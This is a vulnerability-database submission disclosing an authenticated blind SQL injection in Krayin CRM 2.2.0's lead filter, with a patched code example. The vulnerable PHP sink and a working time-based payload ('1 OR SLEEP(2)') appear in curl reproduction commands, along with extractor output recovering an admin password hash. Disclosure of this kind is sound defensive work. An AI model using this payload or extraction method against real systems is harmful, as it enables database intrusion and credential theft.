Submit #831573: Webkul Krayin CRM 2.2.0 SQL Injection

Title: Webkul Krayin CRM 2.2.0 SQL Injection
Description: Krayin CRM 2.2.0 contains an authenticated blind time-based SQL injection in the Leads DataGrid. The `rotten_lead[in]` request parameter is concatenated directly into a `havingRaw()` expression without parameter binding, exposing the database to byte-by-byte extraction by any authenticated staff user — including the lowest-privilege Sales Rep role. The most impactful target row is the bcrypt password hash of the primary admin account, recoverable in roughly fifteen minutes against a localhost install.

The sink is `packages/Webkul/Admin/src/DataGrids/Lead/LeadDataGrid.php`, lines 89-91:

```php
if (! is_null(request()->input('rotten_lead.in'))) {
    $queryBuilder->havingRaw(
        $tablePrefix.'rotten_lead = '.request()->input('rotten_lead.in')
    );
}
```

`rotten_lead[in]` is concatenated directly into `HAVING` with no binding and no type coercion. The endpoint is reachable as any authenticated admin-panel user at `GET /admin/leads` with `X-Requested-With: XMLHttpRequest`, which routes `LeadController::index()` (line 66) to `datagrid(LeadDataGrid::class)->process()`. There is no role-level gate on this specific filter beyond the standard Bouncer "user" middleware, so the lowest-privilege staff role reaches the sink.

## Reproduction

Verified live on a stock Krayin 2.2.0 Docker install, authenticated as a non-admin Sales Rep with five leads visible to the session.

Baseline:

```bash
time curl -sS -b "$JAR" -H "X-Requested-With: XMLHttpRequest" -o /dev/null \
  "http://target/admin/leads?pipeline_id=1&rotten_lead%5Bin%5D=1"
# real 0m0.028s
```

Time-based oracle (`SLEEP(2)` × five matched rows = ~10s):

```bash
time curl -sS -b "$JAR" -H "X-Requested-With: XMLHttpRequest" -o /dev/null \
  "http://target/admin/leads?pipeline_id=1&rotten_lead%5Bin%5D=1%20OR%20SLEEP(2)"
# real 0m10.024s
```

A binary-search extractor recovers the admin bcrypt hash byte-by-byte:

```
[+] calibrating oracle baseline=0.01s sleep_payload=3.02s
[+] extracting: SELECT password FROM users WHERE id=1 LIMIT 1
[01] '$' so far: $
[02] '2' so far: $2
...
[60] '.' so far: $2y$10$TOUeqljAUhpipQJOn2aGg...
```
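A hardened form of the sink, as an added example that is not Krayin's own patch: the filter value is validated before it reaches the query and then passed as a bound parameter, so the SQL text never contains user input. It assumes the Laravel query builder `$queryBuilder` and the `$tablePrefix` variable of the surrounding DataGrid; the helper name `rottenLeadFilterValue` and the treatment of `rotten_lead` as an integer flag are assumptions made for this example.

```php
<?php
// Added example, not code from the Krayin project.
// Assumes $queryBuilder (Illuminate\Database\Query\Builder) and $tablePrefix
// exist exactly as in the surrounding LeadDataGrid code.

// Vulnerable shape reported above: untrusted string spliced into HAVING.
//   $queryBuilder->havingRaw(
//       $tablePrefix.'rotten_lead = '.request()->input('rotten_lead.in')
//   );

/**
 * Coerce the filter value to the only shape a legitimate request carries.
 * The original expression compares rotten_lead against a number (the baseline
 * request sends "1"), so anything that is not an integer is rejected outright.
 * Returns null when the filter is absent or invalid, so the caller skips it.
 * Hypothetical helper name; the 0/1 narrowing assumes rotten_lead is a flag.
 */
function rottenLeadFilterValue(?string $raw): ?int
{
    if ($raw === null || $raw === '') {
        return null;
    }
    // FILTER_VALIDATE_INT returns false for "1 OR SLEEP(2)", "1;", "1.0", etc.
    $value = filter_var($raw, FILTER_VALIDATE_INT);
    if ($value === false || ! in_array($value, [0, 1], true)) {
        return null;
    }
    return $value;
}

$value = rottenLeadFilterValue(request()->input('rotten_lead.in'));
if ($value !== null) {
    // Option A: keep havingRaw() but hand the value to the driver as a binding.
    $queryBuilder->havingRaw($tablePrefix.'rotten_lead = ?', [$value]);

    // Option B (equivalent): the non-raw builder method binds automatically.
    // $queryBuilder->having($tablePrefix.'rotten_lead', '=', $value);
}
```

Either option removes the injection; the validation step additionally makes a malformed filter fail closed instead of reaching the database at all.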
Source: https://bytium.com/insights/krayin-crm-2-2-0-authenticated-blind-sql-injection-in-leads-datagrid
User: suffer (UID 74855)
Submission: 05/16/2026 16:36 (30 days ago)
Moderation: 06/14/2026 13:58 (29 days later)
Status: Duplicate
VulDB entry: 357342 [Krayin CRM 2.2.x /Lead/LeadDataGrid.php rotten_lead sql injection]
Points: 0
